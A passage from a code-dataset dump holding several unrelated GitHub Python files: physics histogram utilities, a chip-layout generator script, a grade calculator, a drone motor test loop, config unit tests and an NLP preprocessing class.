check if re-binning is possible (simple way)\n if current_nbins > new_nbins:\n histogram_ = histogram_.rebinned( bin_edges, axis = 0 )\n if 'TH2' in histogram_.class_name():\n histogram_ = histogram_.rebinned( bin_edges, axis = 1 )\n return histogram_\n\ndef clean_control_region(histograms = {},\n data_label = 'data',\n subtract = [],\n fix_to_zero = True):\n '''This function takes a dictionary of histograms (sample_name:histogram)\n and will subtract all samples given in the parameter \"subtract\" from the\n data distribution.\n '''\n data_hist = deepcopy(histograms[data_label])\n # first subtract all necessary samples\n for sample, histogram in histograms.iteritems():\n if sample in subtract:\n data_hist -= histogram\n # next make sure there are no negative events\n if fix_to_zero:\n for bin_i, y in enumerate(data_hist.y(overflow=True)):\n if y < 0:\n data_hist.SetBinContent(bin_i, 0)\n # add the difference to 0 to the existing error\n data_hist.SetBinError(bin_i, data_hist.GetBinError(bin_i) + abs(y))\n return data_hist\n\ndef adjust_overflow_to_limit(histogram, x_min, x_max):\n ''' Adjust the first and last bin of the histogram such that it becomes\n the new under- and overflow bin'''\n # get the bin before x_min\n histogram_ = deepcopy(histogram)\n underflow_bin = histogram_.FindBin(x_min)\n overflow_bin = histogram_.FindBin(x_max)\n n_bins = histogram_.nbins()\n underflow, underflow_error = 0, 0\n overflow, overflow_error = 0, 0\n if not underflow_bin < 1:\n underflow, underflow_error = histogram_.integral(0, underflow_bin, error=True)\n for i in range(underflow_bin + 1):\n histogram_.SetBinContent(i, 0)\n histogram_.SetBinError(i, 0)\n\n if not overflow_bin > n_bins:\n overflow, overflow_error = histogram_.integral(overflow_bin, n_bins + 1, error=True)\n for i in range(overflow_bin, n_bins + 2):\n histogram_.SetBinContent(i, 0)\n histogram_.SetBinError(i, 0)\n\n histogram_.SetBinContent(underflow_bin, underflow)\n histogram_.SetBinError(underflow_bin, underflow_error)\n histogram_.SetBinContent(overflow_bin, overflow)\n histogram_.SetBinError(overflow_bin, overflow_error)\n\n return histogram_\n\ndef get_fitted_normalisation( variable, channel, path_to_JSON, category, met_type ):\n '''\n This function now gets the error on the fit correctly,\n so that it can be applied if the --normalise_to_fit option is used\n '''\n from dps.config import variable_binning as cfg_binning\n variable_bins_ROOT = cfg_binning.variable_bins_ROOT \n fit_results = read_data_from_JSON( path_to_JSON + variable + '/fit_results/' + category + '/fit_results_' + channel + '_' + met_type + '.txt' )\n\n N_fit_ttjet = [0, 0]\n N_fit_singletop = [0, 0]\n N_fit_vjets = [0, 0]\n N_fit_qcd = [0, 0]\n\n bins = variable_bins_ROOT[variable]\n for bin_i, _ in enumerate( bins ):\n # central values\n N_fit_ttjet[0] += fit_results['TTJet'][bin_i][0]\n N_fit_singletop[0] += fit_results['SingleTop'][bin_i][0]\n N_fit_vjets[0] += fit_results['V+Jets'][bin_i][0]\n N_fit_qcd[0] += fit_results['QCD'][bin_i][0]\n\n # errors\n N_fit_ttjet[1] += fit_results['TTJet'][bin_i][1]\n N_fit_singletop[1] += fit_results['SingleTop'][bin_i][1]\n N_fit_vjets[1] += fit_results['V+Jets'][bin_i][1]\n N_fit_qcd[1] += fit_results['QCD'][bin_i][1]\n\n fitted_normalisation = {\n 'TTJet': N_fit_ttjet,\n 'SingleTop': N_fit_singletop,\n 'V+Jets': N_fit_vjets,\n 'QCD': N_fit_qcd\n }\n return fitted_normalisation\n\ndef get_data_derived_qcd( control_hists, qcd_exclusive_hist ):\n '''\n Retrieves the data-driven QCD template and normalises it to MC prediction.\n It uses the inclusive template (across all variable bins) and removes other processes\n before normalising the QCD template.\n '''\n\n dataDerived_qcd = clean_control_region( control_hists, subtract = ['TTJet', 'V+Jets', 'SingleTop'] )\n normalisation_QCDdata = dataDerived_qcd.integral( overflow = True )\n normalisation_exclusive = qcd_exclusive_hist.integral( overflow = True )\n\n scale = 1.\n if not normalisation_QCDdata == 0:\n if not normalisation_exclusive == 0:\n scale = 1 / normalisation_QCDdata * normalisation_exclusive\n else:\n scale = 1 / normalisation_QCDdata\n dataDerived_qcd.Scale( scale )\n return dataDerived_qcd\n\ndef get_normalisation_error( normalisation ):\n total_normalisation = 0.\n total_error = 0.\n for _, number in normalisation.iteritems():\n total_normalisation += number[0]\n total_error += number[1]\n return total_error / total_normalisation\n\ndef get_fit_results_histogram( data_path = 'data/M3_angle_bl',\n centre_of_mass = 8,\n channel = 'electron',\n variable = 'MET',\n met_type = 'patType1CorrectedPFMet',\n bin_edges = [] ):\n fit_result_input = data_path + '/%(CoM)dTeV/%(variable)s/fit_results/central/fit_results_%(channel)s_%(met_type)s.txt'\n fit_results = read_data_from_JSON( fit_result_input % {'CoM': centre_of_mass, 'channel': channel, 'variable': variable, 'met_type':met_type} )\n fit_data = fit_results['TTJet']\n h_data = value_error_tuplelist_to_hist( fit_data, bin_edges )\n return h_data\n\ndef get_histogram_ratios(nominator, denominators, normalise_ratio_to_errors = False):\n ratios = []\n for denom in denominators:\n ratio = nominator.Clone()\n if normalise_ratio_to_errors:\n # TODO\n # this is a preliminary feature, use with care\n for bin_i in range( 1, nominator.nbins() ):\n x_i = nominator[bin_i].value\n x_i_error = nominator[bin_i].error\n y_i = denom[bin_i].value\n y_i_error = denom[bin_i].error\n numerator = x_i - y_i\n denominator = pow( pow( x_i_error, 2 ) + pow( y_i_error, 2 ), 0.5 )\n if denominator == 0:\n ratio.SetBinContent(bin_i, 0.)\n ratio.SetBinError(bin_i, 0.)\n else:\n ratio.SetBinContent(bin_i, numerator/denominator)\n ratio.SetBinError(bin_i, denominator)\n else:\n ratio.Divide( denom )\n if len(denominators) > 1:\n ratio.linecolor = denom.linecolor\n ratio.fillcolor = denom.fillcolor\n ratios.append(ratio)\n return ratios\n\ndef copy_style(copy_from, copy_to):\n # colours\n copy_to.linecolor = copy_from.linecolor\n copy_to.markercolor = copy_from.markercolor\n copy_to.fillcolor = copy_from.fillcolor\n # style\n copy_to.markerstyle = copy_from.markerstyle\n copy_to.linestyle = copy_from.linestyle\n copy_to.fillstyle = copy_from.fillstyle\n # size\n copy_to.markersize = copy_from.markersize\n copy_to.linesize = copy_from.markersize\n # legend\n copy_to.legendstyle = copy_from.legendstyle\n\n\ndef make_line_hist(bin_edges, y_value):\n l = Hist(bin_edges, type = 'D')\n for i in range(1, len(bin_edges)):\n l.SetBinContent(i, y_value)\n return l\n\ndef absolute(hist):\n h = deepcopy(hist)\n for bin_i in range(1, h.nbins() + 1):\n value = h.GetBinContent(bin_i)\n error = h.GetBinError(bin_i)\n h.SetBinContent(bin_i, abs(value))\n h.SetBinError(bin_i, abs(error))\n return h\n\nif __name__ == '__main__':\n value_error_tuplelist = [( 0.006480446927374301, 0.0004647547547401945 ),\n ( 0.012830288388947605, 0.0010071677178938234 ),\n ( 0.011242639287332025, 0.000341258792551077 ),\n ( 0.005677185565453722, 0.00019082371879446718 ),\n ( 0.0008666767325985203, 5.0315979327182054e-05 )]\n hist = value_error_tuplelist_to_hist( value_error_tuplelist, bin_edges = [0, 25, 45, 70, 100, 300] )\n import rootpy.plotting.root2matplotlib as rplt\n import matplotlib.pyplot as plt\n plt.figure( figsize = ( 16, 10 ), dpi = 100 )\n plt.figure( 1 )\n rplt.errorbar( hist, label = 'test' )\n plt.xlabel( 'x' )\n plt.ylabel( 'y' )\n plt.title( 'Testing' )\n plt.legend( numpoints = 1 )\n plt.savefig( 'Array2Hist.png' )\n plt.close()\n\n value_errors_tuplelist = [( 0.006480446927374301, 0.0004647547547401945, 0.0004647547547401945 * 2 ),\n ( 0.012830288388947605, 0.0010071677178938234, 0.0010071677178938234 * 2 ),\n ( 0.011242639287332025, 0.000341258792551077 * 2, 0.000341258792551077 ),\n ( 0.005677185565453722, 0.00019082371879446718 * 2, 0.00019082371879446718 ),\n ( 0.0008666767325985203, 5.0315979327182054e-05, 5.0315979327182054e-05 )]\n hist = value_errors_tuplelist_to_graph( value_errors_tuplelist, bin_edges = [0, 25, 45, 70, 100, 300] )\n tuplelist = graph_to_value_errors_tuplelist( hist )\n assert tuplelist == value_errors_tuplelist\n\n plt.figure( figsize = ( 16, 10 ), dpi = 100 )\n plt.figure( 1 )\n rplt.errorbar( hist, label = 'test2' )\n plt.xlabel( 'x' )\n plt.ylabel( 'y' )\n plt.title( 'Testing' )\n plt.legend( numpoints = 1 )\n plt.savefig( 'Array2Graph.png' )\n","repo_name":"BristolTopGroup/DailyPythonScripts","sub_path":"dps/utils/hist_utilities.py","file_name":"hist_utilities.py","file_ext":"py","file_size_in_byte":23213,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"20309576076","text":"import laygo\nimport numpy as np\nimport yaml\n#import logging;logging.basicConfig(level=logging.DEBUG)\n\nimport os.path\nlaygen = laygo.GridLayoutGenerator(config_file='laygo_config.yaml')\nif laygen.tech=='laygo10n' or laygen.tech=='laygo_faketech': #fake technology\n laygen.use_phantom = True\n\nworkinglib = 'laygo_working'\nutemplib = laygen.tech+'_microtemplates_dense'\nltemplib = laygen.tech+'_templates_logic'\n\nlaygen.add_library(workinglib); laygen.sel_library(workinglib)\n\nlaygen.load_template(filename=laygen.tech+'_microtemplates_dense_templates.yaml', libname=utemplib)\nlaygen.load_template(filename=laygen.tech+'_templates_logic_templates.yaml', libname=ltemplib)\nlaygen.load_grid(filename=laygen.tech+'_microtemplates_dense_grids.yaml', libname=utemplib)\nlaygen.templates.sel_library(ltemplib)\nlaygen.grids.sel_library(utemplib)\n#laygen.templates.display()\n#laygen.grids.display()\n\npg = 'placement_basic' #placement grid\nrg_m1m2 = 'route_M1_M2_basic'\nrg_m2m3 = 'route_M2_M3_basic'\nrg_m3m4 = 'route_M3_M4_basic'\nrg_m1m2_pin = 'route_M1_M2_basic'\nrg_m2m3_pin = 'route_M2_M3_basic'\n\nmycell = '_generate_example_4'\npg = 'placement_basic' #placement grid\nlaygen.add_cell(mycell)\nlaygen.sel_cell(mycell) #select the cell to work on\n\n#placement\nimux0=laygen.place(None, 'tinv_4x', pg, xy=np.array([0,0]))\nispace0=laygen.relplace(name = None, templatename = 'space_1x', gridname = pg, refinstname = imux0.name, shape=np.array([3,1]))\nimux1=laygen.relplace(name = None, templatename = 'tinv_4x', gridname = pg, refinstname = ispace0.name)\nispace1=laygen.relplace(name = None, templatename = 'space_1x', gridname = pg, refinstname = imux1.name, shape=np.array([2,1]))\niinv0=laygen.relplace(name = None, templatename = 'inv_4x', gridname = pg, refinstname = ispace1.name)\n\n#route\nxy_en=laygen.get_template_pin_xy(imux0.cellname, 'EN', rg_m3m4)[0]\nxy_enb=laygen.get_template_pin_xy(imux0.cellname, 'ENB', rg_m3m4)[0]\nxy_o=laygen.get_template_pin_xy(imux0.cellname, 'O', rg_m3m4)[0]\nxy_inv_i=laygen.get_template_pin_xy(iinv0.cellname, 'I', rg_m3m4)[0]\nlaygen.route(None, laygen.layers['metal'][4], xy0=np.array([xy_en[0],xy_enb[1]]), xy1=np.array([xy_enb[0],xy_enb[1]]), gridname0=rg_m3m4, refinstname0=imux0.name, refinstname1=imux1.name)\nlaygen.route(None, laygen.layers['metal'][4], xy0=np.array([xy_enb[0],xy_enb[1]+1]), xy1=np.array([xy_en[0],xy_enb[1]+1]), gridname0=rg_m3m4, refinstname0=imux0.name, refinstname1=imux1.name)\nlaygen.route(None, laygen.layers['metal'][4], xy0=np.array([xy_o[0],xy_enb[1]+2]), xy1=np.array([xy_inv_i[0],xy_enb[1]+2]), gridname0=rg_m3m4, refinstname0=imux0.name, refinstname1=iinv0.name)\nlaygen.via(None, np.array([xy_en[0],xy_enb[1]]), refinstname=imux0.name, gridname=rg_m3m4)\nlaygen.via(None, np.array([xy_enb[0],xy_enb[1]]), refinstname=imux1.name, gridname=rg_m3m4)\nlaygen.via(None, np.array([xy_enb[0],xy_enb[1]+1]), refinstname=imux0.name, gridname=rg_m3m4)\nlaygen.via(None, np.array([xy_en[0],xy_enb[1]+1]), refinstname=imux1.name, gridname=rg_m3m4)\nlaygen.via(None, np.array([xy_o[0],xy_enb[1]+2]), refinstname=imux0.name, gridname=rg_m3m4)\nlaygen.via(None, np.array([xy_o[0],xy_enb[1]+2]), refinstname=imux1.name, gridname=rg_m3m4)\nlaygen.via(None, np.array([xy_inv_i[0],xy_enb[1]+2]), refinstname=iinv0.name, gridname=rg_m3m4)\n\n#laygen.display()\n#db.display()\n\n#bag export, if bag does not exist, gds export\nimport imp\ntry:\n imp.find_module('bag')\n import bag\n prj = bag.BagProject()\n laygen.sel_cell(mycell)\n laygen.export_BAG(prj, array_delimiter=['[', ']'])\nexcept ImportError:\n laygen.sel_cell(mycell) # cell selection\n laygen.export_GDS('output.gds', layermapfile=laygen.tech+\".layermap\") # change layermapfile\n","repo_name":"rowhit/laygo","sub_path":"labs/lab2_d_gridlayoutgenerator_layoutexercise_2.py","file_name":"lab2_d_gridlayoutgenerator_layoutexercise_2.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5070524326","text":"\"\"\"\r\n__author__ = Yash Patel\r\n__name__ = extract.py\r\n__description__ = Given classifications provided by the clustering algorithm (given in \r\na binary pickle format), determines the corresponding accuracy \r\n\"\"\"\r\n\r\nimport pickle\r\n\r\ndef compute_accuracy(truth_fn, guess_fn):\r\n truth = pickle.load(open(truth_fn, \"rb\"))\r\n guess = pickle.load(open(guess_fn, \"rb\"))\r\n \r\n truth_wallets = truth.values()\r\n guess_wallets = guess.values()\r\n\r\n guess_performance = {}\r\n for guess_wallet in guess_wallets:\r\n total_overlap = 0\r\n for true_owner in truth:\r\n overlap = len(guess_wallet.intersection(truth[true_owner]))\r\n total_overlap += overlap\r\n if overlap > 0:\r\n if guess_wallet not in guess_performance:\r\n guess_performance[guess_wallet] = {}\r\n guess_performance[guess_wallet][true_owner] = overlap\r\n if total_overlap > 0:\r\n for owner in guess_performance[guess_wallet]:\r\n guess_performance[guess_wallet] /= total_overlap\r\n return guess_performance\r\n\r\ndef write_performance(truth_fn, guess_fn):\r\n guess_performance = compute_accuracy(truth_fn, guess_fn)\r\n with open(\"truth/accuracy.txt\", \"w\") as f:\r\n for person in guess_performance:\r\n f.write(\"{} : {}\\n\".format(person, guess_performance[person]))\r\n\r\nif __name__ == \"__main__\":\r\n write_performance(\r\n \"output/SpectralClustering_guess.pickle\", \r\n \"truth/extracted.pickle\")","repo_name":"yashpatel5400/anonychain","sub_path":"truth/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33693372402","text":"\n\n## PYTHON\n\n# Define a function to get inputs\ndef getExamInput():\n try:\n ahmet = int(input(\"Midterm 1: \"))\n mehmet = int(input(\"Midterm 2: \"))\n necdet = int(input(\"Final : \"))\n\n return ahmet,mehmet,necdet\n\n except: # If it is not an integer warn the user\n print(\"Please type an integer !!\")\n return getExamInput()\n\n# Print Welcome Title\nprint(\"\\n\\n--- A-MEAN Grade Calculator ---\\n\\n\")\n\n# Get Student Name from User\nstudentName = input(\"Name: \")\n\n# Try - Get Exam Grades\nmid1,mid2,final = getExamInput()\n\n# Calculate the average\naverage = mid1 * 0.3 + mid2 * 0.3 + final * 0.4\n\n## Decide the letter grade\nletterGrade = \"\"\n\nif(average > 90):\n letterGrade = \"A\"\nelif(average > 80):\n letterGrade = \"B\"\nelif(average > 70):\n letterGrade = \"C\"\nelif(average > 60):\n letterGrade = \"D\"\nelse:\n letterGrade = \"F\"\n\noutput = f\"\"\"\n------------------------\nStudent : {studentName}\nMidterm 1: {mid1}\nMidterm 2: {mid2}\nFinal : {final}\n------------------------\nAveage : {average}\nLetter Grade : {letterGrade}\n\"\"\"\n\nprint(output)\n\n\n","repo_name":"eminkartci/PythonCourse","sub_path":"Archive/Lecture1/gradeCalculator.py","file_name":"gradeCalculator.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10219743847","text":"import operator\nimport sys \n# input = [0, 2, 7, 0]\ninput = [10, 3, 15, 10, 5, 15, 5, 15, 9, 2, 5, 8, 5, 2, 3, 6]\n\ndef redist(l):\n index, max_value = max(enumerate(l), key=operator.itemgetter(1))\n \n blocks_to_redist = max(int(max_value / (len(l) - 1)), 1)\n remaining_blocks = max_value\n blocks = list(l)\n blocks[index] = 0\n index = (index + 1) % len(blocks)\n \n while remaining_blocks > blocks_to_redist:\n blocks[index] += blocks_to_redist\n remaining_blocks -= blocks_to_redist\n index = (index + 1) % len(blocks)\n\n # move the last chunk of blocks\n blocks[index] += remaining_blocks\n return blocks\n \ndef count_redist(l):\n results = []\n count = 0\n result = l\n while True:\n count += 1\n result = redist(result)\n if result in results:\n return result, count\n \n results.append(result)\n\nredistributed, count = count_redist(input) \nprint(count)\n\nprint(count_redist(redistributed)[1] - 1)\n","repo_name":"gordonshieh/Advent2017","sub_path":"day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73489912729","text":"from . import percentiles\n\n# for now using the percentile ranks from the original SAT 1600 test\n# pre-2007\nSAT_conversions = {\n \"composite\": percentiles.SAT_1600_COMPOSITE,\n \"math\": percentiles.SAT_1600_MATH,\n \"reading_writing\": percentiles.SAT_1600_VERBAL\n}\n\nACT_conversions = {\n \"composite\": percentiles.ACT_COMPOSITE,\n \"math\": percentiles.ACT_MATH,\n \"english\": percentiles.ACT_ENGLISH,\n \"reading\": percentiles.ACT_READING,\n \"science\": percentiles.ACT_SCIENCE,\n}\n\n\ndef dataframe_to_ranks(dataframe):\n \"\"\"Given a DataFrame of raw ACT/SAT scores by composite and subject,\n convert scores into percentile ranks.\"\"\"\n columns = {}\n for colname in dataframe.columns:\n if 'equivalent' in colname:\n continue\n col = dataframe[colname]\n if col.dtype == 'int64':\n col = score_to_rank(col, colname)\n columns[colname] = col\n return pd.concat(columns, axis=1).reindex(dataframe.index)\n\n\ndef score_to_rank(scores, subject):\n # try to infer the type of test by looking at range of scores.\n # ACT = 1-36 and SAT = 200-800\n test_type = \"ACT\" if scores.max() <= 36 else \"SAT\"\n conversions = ACT_conversions if test_type == \"ACT\" else SAT_conversions\n return scores.map(conversions[subject])\n\n\ndef ranks_to_cdf(ranks):\n xs = pd.Series(list(range(1,100)))\n cdf = xs.map(lambda x: (ranks < x).sum())\n cdf = cdf.reindex(xs).fillna(method='ffill')\n # normalize the cdf to percentage\n return cdf / len(ranks)\n\n","repo_name":"jephdo/kaplan-sat-parser","sub_path":"kaplanparse/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40517063209","text":"import imu2 as imu\nimport motors\nimport time\nimport json\nimport matplotlib.pyplot as plt\n\nimport RPi.GPIO as GPIO\nimport board\nimport busio\nimport adafruit_pca9685\ni2c = busio.I2C(board.SCL, board.SDA)\nhat = adafruit_pca9685.PCA9685(i2c)\n\nif __name__ == \"__main__\":\n mpu = imu.mpu6050(0x68)\n hat.frequency = 50\n mpu.set_gyro_range(mpu.GYRO_RANGE_2000DEG)\n\n angles = {'x': 0, 'y': 0}\n errors = {'count': 1030, 'x':1.72, 'y':0.55, 'z':1.34} \n\n rotor0 = motors.Rotor(0, 50)\n rotor1 = motors.Rotor(1, 50)\n rotor2 = motors.Rotor(2, 50)\n rotor3 = motors.Rotor(3, 50)\n\n def constrain(value, minimum, maximum):\n return max(min(maximum, value), minimum)\n\n general_throttle = 50\n p = 10\n\n rotor0.thrust(general_throttle)\n rotor1.thrust(general_throttle)\n rotor2.thrust(general_throttle)\n rotor3.thrust(general_throttle)\n\n readTimeAvg = 0\n run_time = 20\n counter = 0\n moAvg1 = 0\n moAvg2 = 0\n gyro_read = {'x':0, 'y':0, 'z':0}\n t1 = time.time()\n x_arr = []\n axis_x_arr = []\n axis_y_arr = []\n prev = 1\n t6 = time.time()\n\n d_x = 0\n d_y = 0\n t5 = time.time()\n\n while time.time()-t5 < run_time:\n t3 = time.time()\n gyro_read['x'] = mpu.get_gyro_data()['x']-errors['x']\n gyro_read['y'] = mpu.get_gyro_data()['y']-errors['y']\n readTimeAvg += time.time()-t3\n\n rotor0.thrust(general_throttle+gyro_read['x'])\n rotor1.thrust(general_throttle-gyro_read['x'])\n rotor2.thrust(general_throttle+gyro_read['y'])\n rotor3.thrust(general_throttle-gyro_read['y'])\n counter += 1\n x_arr.append(counter)\n axis_x_arr.append(gyro_read['x'])\n axis_y_arr.append(gyro_read['y'])\n\n print(\"Loop Frequency:\", counter/run_time)\n print(\"Read Time Average:\", readTimeAvg/counter)\n rotor0.thrust(0)\n rotor1.thrust(0)\n rotor2.thrust(0)\n rotor3.thrust(0)\n plt.plot(x_arr, axis_x_arr)\n plt.plot(x_arr, axis_y_arr)\n plt.show()","repo_name":"RichardWessels/DroneFlightSystem","sub_path":"dfs_func/stopAngularRotAll.py","file_name":"stopAngularRotAll.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6442593799","text":"from imports import *\nfrom mock import mock_open, call\nimport yaml\nfrom StringIO import StringIO\n\nfrom ngs_mapper import config\n\nclass Base(common.BaseClass):\n modulepath = 'ngs_mapper.config'\n\n def setUp(self):\n super(Base,self).setUp()\n\n self.config = {\n 'NGSDATA': self.tempdir,\n 'base_caller': {\n 'bias': {\n 'default': 10\n }\n }\n }\n\n def _create_yaml_from_config(self, config):\n import yaml\n return yaml.dump(config)\n\n@patch('ngs_mapper.config.yaml', autospec=True)\nclass TestLoadConfigFile(Base):\n functionname = 'load_config'\n\n def test_loads_config_stream(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n config_stream = mock_open(read_data=self._create_yaml_from_config(self.config))()\n r = self._C(config_stream)\n eq_(self.tempdir, r['NGSDATA'])\n\n def test_loads_config_filepath(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n with patch('__builtin__.open') as mock_open:\n r = self._C('/path/to/file.yaml')\n eq_(self.tempdir, r['NGSDATA'])\n mock_open.assert_called_once_with('/path/to/file.yaml')\n mock_yaml.load.assert_called_once_with(mock_open())\n\n @patch('__builtin__.open', Mock())\n def test_invalid_config_raises_exception(self, mock_yaml):\n self.config['NGSDATA'] = '/missing/path'\n mock_yaml.load.return_value = self.config\n from ngs_mapper.config import InvalidConfigError\n assert_raises(InvalidConfigError, self._C, '/path/to/file.yaml')\n\n @attr('current')\n @patch('__builtin__.open', Mock())\n def test_returns_config_class_instance(self, mock_yaml):\n from ngs_mapper.config import Config\n mock_yaml.load.return_value = self.config\n r = self._C('/path/to/my.yaml')\n assert isinstance(r, Config), 'not instance of Config'\n\n@attr('current')\nclass TestConfigClass(Base):\n def setUp(self):\n super(TestConfigClass,self).setUp()\n self.config = {\n 'foo': 'bar'\n }\n self.inst = config.Config(self.config)\n\n def test_returns_values_from_getitem(self):\n eq_('bar', self.inst['foo'])\n\n def test_returns_values_from_attributes(self):\n eq_('bar', self.inst.foo)\n\n def test_raises_exception_missing_value_attribute(self):\n self.inst.yaml = {}\n assert_raises(config.InvalidConfigError, self.inst.__getattr__, 'foo')\n\n def test_raises_exception_missing_value_getitem(self):\n self.inst.yaml = {}\n assert_raises(config.InvalidConfigError, self.inst.__getitem__, 'foo')\n\nclass TestVerifyConfig(Base):\n functionname = 'verify_config'\n\n def test_bias_value_lt_1_raises_error(self):\n from ngs_mapper.config import InvalidConfigError\n self.config['base_caller']['bias']['default'] = 0\n assert_raises(InvalidConfigError, self._C, self.config)\n\n def test_ngsdata_not_set_raises_error(self):\n from ngs_mapper.config import InvalidConfigError\n self.config['NGSDATA'] = '/non/existant/path'\n assert_raises(InvalidConfigError, self._C, self.config)\n\n def test_valid_config_no_error(self):\n self.config['NGSDATA'] = self.tempdir\n self._C(self.config)\n\n@patch('__builtin__.open', Mock())\n@patch('pkg_resources.resource_stream')\n@patch('ngs_mapper.config.yaml')\nclass TestLoadDefaultConfig(Base):\n functionname = 'load_default_config'\n\n def test_loads_from_pkg_resources(self, mock_yaml, mock_stream):\n mock_stream.return_value = mock_open(read_data=self._create_yaml_from_config(self.config))()\n mock_yaml.load.return_value = self.config\n r = self._C()\n eq_(self.tempdir, r['NGSDATA'])\n\n@patch('ngs_mapper.config.yaml')\n@patch('__builtin__.open', MagicMock())\nclass TestMakeExampleConfig(Base):\n functionname = 'make_example_config'\n\n def test_invalid_savepath_raises_exception(self, mock_yaml):\n assert_raises(ValueError, self._C, '/non/existant/path.yaml')\n\n def test_makes_config_cwd_is_default(self, mock_yaml):\n from ngs_mapper.config import load_config\n mock_yaml.load.return_value = self.config\n r = self._C()\n config = load_config(r)\n eq_(self.tempdir,config['NGSDATA'])\n\n def test_makes_config_to_specified_path(self, mock_yaml):\n from ngs_mapper.config import load_config\n mock_yaml.load.return_value = self.config\n os.mkdir('configdir')\n savepath = join('configdir', 'config.yaml')\n r = self._C(savepath)\n config = load_config(r)\n eq_(self.tempdir,config['NGSDATA'])\n eq_(r, savepath)\n\n@patch('ngs_mapper.config.yaml')\n@patch('__builtin__.open', MagicMock())\nclass TestGetConfigArgparse(Base):\n functionname = 'get_config_argparse'\n\n def test_outputs_version(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n with patch('ngs_mapper.config.sys') as msys:\n with patch('ngs_mapper.config.ngs_mapper') as mngs_mapper:\n mngs_mapper.__version__ = '1.1.1'\n msys.stdout = StringIO()\n r = self._C(['--version'])\n eq_('Version 1.1.1\\n', msys.stdout.getvalue())\n\n def test_does_not_parse_help(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n r = self._C(['--help'])\n parser, args, config, configfile = r\n ok_('--help' in args, 'Parsed --help when it should not have')\n \n def test_returns_valid_argparse(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n from argparse import ArgumentParser\n r = self._C(['--foo', 'foo'])\n parser, args, config, configfile = r\n parser = ArgumentParser(parents=[parser])\n parser.add_argument('--foo')\n args = parser.parse_args(args)\n eq_(args.foo, 'foo')\n\n def test_returns_default_config(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n r = self._C([])\n parser, args, config, configfile = r\n eq_(self.tempdir, config['NGSDATA'])\n eq_(configfile, None)\n\n def test_returns_specified_config(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n with patch('ngs_mapper.config.load_config') as mock_load_config:\n r = self._C(['-c','/path/to/file.yaml'])\n parser, args, config, configfile = r\n mock_load_config.assert_called_once_with('/path/to/file.yaml')\n eq_('/path/to/file.yaml', configfile)\n\n@patch('__builtin__.open')\n@patch('ngs_mapper.config.yaml')\n@patch('argparse.ArgumentParser.parse_args')\nclass TestMain(Base):\n functionname = 'main'\n\n def test_creates_config(self,mock_parse_args, mock_yaml, mock_open):\n curconfigpath = join(self.tempdir, 'my.yaml')\n mock_yaml.load.return_value = self.config\n parse_args = Mock()\n parse_args.save_to = curconfigpath\n mock_parse_args.return_value = parse_args\n\n import StringIO\n stdout = StringIO.StringIO()\n with patch('sys.stdout', stdout):\n self._C()\n # Make sure script outputs path to config created\n eq_(curconfigpath, stdout.getvalue().rstrip())\n","repo_name":"VDBWRAIR/ngs_mapper","sub_path":"ngs_mapper/tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":7268,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"30221142005","text":"import re\n\nimport distance\nimport nltk\nfrom bs4 import BeautifulSoup\nfrom fuzzywuzzy import fuzz\nfrom nltk.corpus import stopwords\n\n\nclass Preprocessing:\n def __init__(self):\n nltk.download(\"stopwords\")\n nltk.download(\"averaged_perceptron_tagger\")\n\n def get_token_features(self, q1, q2):\n\n safe_div = 0.0001\n\n stop_words = stopwords.words(\"english\")\n\n stop_words.append(\"difference\")\n stop_words.append(\"different\")\n stop_words.append(\"best\")\n\n token_features = [0.0] * 14\n\n q1 = q1.split()\n q2 = q2.split()\n\n q1_stops = set([word for word in q1 if word in stop_words])\n q2_stops = set([word for word in q2 if word in stop_words])\n common_stops = q1_stops & q2_stops\n\n q1 = [word for word in q1 if word not in stop_words]\n q2 = [word for word in q2 if word not in stop_words]\n\n q1_stemmed = \" \".join([word for word in q1])\n q2_stemmed = \" \".join([word for word in q2])\n\n if len(q1) == 0 or len(q2) == 0:\n return (token_features, q1_stemmed, q2_stemmed)\n\n q1_tagged = nltk.pos_tag(q1)\n q2_tagged = nltk.pos_tag(q2)\n\n q1_adj = set()\n q2_adj = set()\n q1_prn = set()\n q2_prn = set()\n q1_n = set()\n q2_n = set()\n\n for word in q1_tagged:\n if word[1] == \"JJ\" or word[1] == \"JJR\" or word[1] == \"JJS\":\n q1_adj.add(word[0])\n elif word[1] == \"NNP\" or word[1] == \"NNPS\":\n q1_prn.add(word[0])\n elif word[1] == \"NN\" or word[1] == \"NNS\":\n q1_n.add(word[0])\n\n for word in q2_tagged:\n if word[1] == \"JJ\" or word[1] == \"JJR\" or word[1] == \"JJS\":\n q2_adj.add(word[0])\n elif word[1] == \"NNP\" or word[1] == \"NNPS\":\n q2_prn.add(word[0])\n elif word[1] == \"NN\" or word[1] == \"NNS\":\n q2_n.add(word[0])\n\n q1 = set(q1)\n q2 = set(q2)\n common_tokens = q1 & q2\n\n q1_words = set(q1)\n q2_words = set(q2)\n common_words = q1_words & q2_words\n\n # Features: counter tokens\n token_features[0] = len(q1) * 1.0\n token_features[1] = len(q2) * 1.0\n token_features[2] = len(q1_stemmed) * 1.0\n token_features[3] = len(q2_stemmed) * 1.0\n token_features[4] = 